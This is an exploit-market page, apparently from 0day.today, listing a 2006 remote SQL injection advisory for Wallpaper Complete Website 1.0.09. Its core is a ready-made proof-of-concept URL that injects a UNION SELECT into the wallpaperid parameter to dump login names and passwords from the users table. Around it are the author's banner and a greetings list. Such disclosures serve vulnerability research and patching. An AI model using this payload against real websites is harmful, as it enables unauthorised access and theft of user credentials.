[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wallpaper Complete Website 1.0.09 Remote SQL Injection Vulnerabilities

Author
GregStar
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1199
Category
web applications
Date add
23-11-2006
Platform
unsorted
======================================================================
Wallpaper Complete Website 1.0.09 Remote SQL Injection Vulnerabilities
======================================================================





*************************************************************************************************************************#
                                                              					          		 #
			               			 Coding 4 Fun     						 #	
			                                      						  		 #
*************************************************************************************************************************#
													  		 #
* Wallpaper Complete Website  1.0.09                                                                                     #
													  		 #	
* Class = SQL Injection ;										  		 #
													  		 #
* Found by = GregStar                                             				          		 #
												  	  		 #
-------------------------------------------------------------------------------------------------------------------------#
													  		 #
													  		 #
- PoC:												          		 #
													  		 #
http://[target]/[path]/wallpaper.php?wallpaperid=1%20UNION%20SELECT%20login,0,0,0,0,password%20FROM%20users%20/* 	 #
															 #
															 #
*************************************************************************************************************************#													  				
Gr33tz:  sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,rfl,d3m0n,java,reyw,kw@ch.	  		 #
												          		 #
*************************************************************************************************************************#



#  0day.today [2024-12-25]  #